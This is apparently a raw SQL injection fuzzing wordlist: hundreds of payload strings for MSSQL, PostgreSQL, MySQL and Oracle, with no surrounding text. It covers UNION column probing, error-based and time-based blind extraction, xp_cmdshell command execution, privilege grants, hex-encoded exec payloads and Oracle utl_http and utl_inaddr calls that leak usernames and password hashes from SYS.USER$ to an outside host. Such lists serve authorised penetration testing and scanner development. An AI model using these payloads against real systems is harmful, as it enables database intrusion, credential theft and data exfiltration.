SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))# UNION ALL SELECT NULL AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107))) AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC) AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- UNION ALL SELECT 'INJ'||'ECT'||'XXX' UNION ALL SELECT 'INJ'||'ECT'||'XXX',2 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- UNION ALL SELECT 'INJ'||'ECT'||'XXX'# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# 1'1 1 exec sp_ (or exec xp_) 1 and 1=1 1' and 1=(select count(*) from tablenames); -- 1 or 1=1 1' or '1'='1 1or1=1 1'or'1'='1 fake@ema'or'il.nl'='il.nl 1 1 and user_name() = 'dbo' \'; desc users; -- 1\'1 1' and non_existant_table = '1 ' or username is not NULL or username = ' 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 1 uni/**/on select all from where ; -- '; -- '); -- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- ' grant connect to name; grant resource to name; -- ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- ’ or ‘1’=’1 ' or '1'='1 '||utl_http.request('httP://192.168.1.1/')||' ' || myappadmin.adduser('admin', 'newpass') || ' ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i <>"'%;)(&+ | ! ? / // //* ' ' -- ( ) *| */* & 0 031003000270000 0 or 1=1 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 